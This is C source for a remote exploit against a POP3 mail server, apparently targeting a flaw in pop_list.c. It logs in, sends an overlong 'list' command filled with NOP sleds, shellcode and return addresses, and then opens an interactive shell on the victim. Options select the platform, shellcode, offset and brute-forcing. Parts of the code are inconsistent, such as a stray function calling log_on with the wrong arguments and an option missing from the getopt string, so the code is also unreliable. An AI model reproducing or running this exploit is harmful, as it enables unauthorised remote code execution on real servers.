/*-----------------------------------------------------------------------------
Section: Function Definitions
----------------------------------------------------------------------------*/
static unsigned int
connect_start(void)
{
(void)ini_get_server_ip(serverip);
(void)ini_get_server_port(&port);
(void)ini_get_log_flag(&logflag);
(void)log_init();
log_on(logflag);
return socket_init(serverip, port);
}
int main(int argc, char **argv)
{
int i, next_arg = 0;
char *progname = argv[0];
char *remote_user = NULL,
*remote_passwd = NULL,
*message_number = strdup("1");
if (argc < 4)
usage(progname);
memset ((char *)&bruteforce, '\0', sizeof((char *)&bruteforce));
victim = (char *)strdup(argv[1]);
argv++;
argc--;
remote_user = (char *)strdup(argv[1]);
argv++;
argc--;
remote_passwd = (char *)strdup(argv[1]);
argv++;
argc--;
while ( (next_arg = getopt(argc, argv, "p:t:s:o:r:i:b")) != EOF)
switch (next_arg)
{
case 'p':
if ( (atoi(optarg) < 0) || (atoi(optarg) > 65535) )
{
fprintf (stderr, "Outrageous port-number! Stick with a number below 65535 (and above zero)\n");
usage (progname);
}
port = atoi(optarg);
printf (" -> Port set to %d.\n", port);
break;
case 't':
if ( (atoi(optarg) < 0) || (atoi(optarg) > MAX_TYPE) )
{
fprintf (stderr, "Invalid type, should range from 0 to %d.\n", MAX_TYPE);
usage (progname);
}
type = atoi(optarg);
printf (" -> Type set to %d, %s %s.\n", type, platforms[type].platform, platforms[type].tested_on);
break;
case 's':
if ( (atoi(optarg) < 0) || (atoi(optarg) > MAX_SHELLCODE) )
{
fprintf (stderr, "Invalid shellcode number, should range from 0 to %d.\n", MAX_SHELLCODE);
usage (progname);
}
shellcode_num = atoi(optarg);
printf (" -> Shellcode set for %s, %s.\n", shellcodes[shellcode_num].platform, shellcodes[shellcode_num].function);
break;
case 'o':
if (bruteforce.on == 1)
{
fprintf (stderr, "You cannot specify -offset and -bruteforce at the same time.\nMake up your mind!\n");
exit (-1);
}
offset = atoi(optarg);
printf (" -> Offset set to %d.\n", offset);
break;
case 'b':
bruteforce.on = 1;
printf (" -> Bruteforce mode selected (not fully implemented in this version)\n");
printf (" -> Enter offsets seperated with a space, and a 'step' number (e.g. \"bfffffff bffff000 4\"):\n ");
if ( (fscanf (stdin, "%x %x %d", &bruteforce.start, &bruteforce.end, &bruteforce.step)) != 3)
{
fprintf (stderr, "Unknown offsets.\n");
exit (-1);
}
break;
case 'i':
impact_place = atoi(optarg);
printf (" -> Place of impact set to %d.\n", impact_place);
break;
case 'r':
appenders = atoi(optarg);
printf (" -> Number of return addresses set to %d.\n", appenders);
break;
case 'm':
message_number = strdup(optarg);
printf ("-> Message number set to \"%.10s\".\n", message_number);
break;
default:
fprintf (stderr, "Fictional option: '%c', please take your medication.\n", next_arg);
usage (progname);
break;
}
do_lookup();
printf ("\nAttacking %s, a %s %s host\n", victim, platforms[type].platform, platforms[type].tested_on);
if (shellcode_num != -1)
{
platforms[type].shellcode = &(shellcodes[shellcode_num]);
printf (" - Using %s shellcode\n", shellcodes[shellcode_num].platform);
} else
printf (" - Using the default shellcode, %s\n", platforms[type].shellcode->platform);
if (bruteforce.on == 0)
{
platforms[type].address -= offset;
printf (" - Using return address %#x\n", platforms[type].address);
printf ("\nAssembling shellspawning code\n");
} else
printf (" - Going to bruteforce from %#x to %#x in steps of %d\n", bruteforce.start, bruteforce.end, bruteforce.step);
printf ("-> Connecting to %s, port %d\n", inet_ntoa(in), port);
do_connect();
receive ();
log_on (remote_user, remote_passwd, sock);
memset (buffer, '\0', sizeof(buffer));
sprintf (buffer, "list %.10s ", message_number); //the bug lies in pop_list.c
/* I do the '%s' to allow the possibility to enter '0001', in order
a non-working length of <nops>+<shellcode>+<ret>... (theoretically ;) */
#ifdef DEBUG
printf ("Step 1, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));
#endif
memset (buffer+strlen(buffer), NOP, sizeof(buffer)-strlen(buffer)-1);
#ifdef DEBUG
printf ("Step 2, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));
#endif
strncpy (buffer + impact_place - strlen(platforms[type].shellcode->code), platforms[type].shellcode->code,
sizeof(buffer) - impact_place - 5 - 1);
//impact_place + strlen(platforms[type].shellcode->code) - (APPEND_ADDRESSES * sizeof(platforms[type].address) + 2) - 1);
#ifdef DEBUG
printf ("Step 3, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));
#endif
i = 0;
while (i < appenders)
{
/*
o = buffer + strlen(buffer);
*(o) = (platforms[type].address & 0x000000ff);
*(o+1) = (platforms[type].address & 0x0000ff00) >> 8;
*(o+2) = (platforms[type].address & 0x00ff0000) >> 16;
*(o+3) = (platforms[type].address & 0xff000000) >> 24;
*(o+4) = '\0';
*/
memcpy ((char *)&buffer + strlen(buffer), &platforms[type].address, 4);
#ifdef HARDCORE
printf ("-> sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));
#endif
i++;
}
strcpy (buffer + strlen(buffer), "\x0d\x0a"); // \x00 gets appended automatically
#ifdef HARDCORE
printf ("Code is:\n\033[1;31m");
for (i = 0; i < strlen(buffer); i++)
printf ("%02x ", buffer[i]);
printf ("\033[0;37m\n");
#endif
transmit (buffer);
receive ();
printf ("Got shell!\n");
terminal (sock);
close (sock);
//not reached
return (0);
}
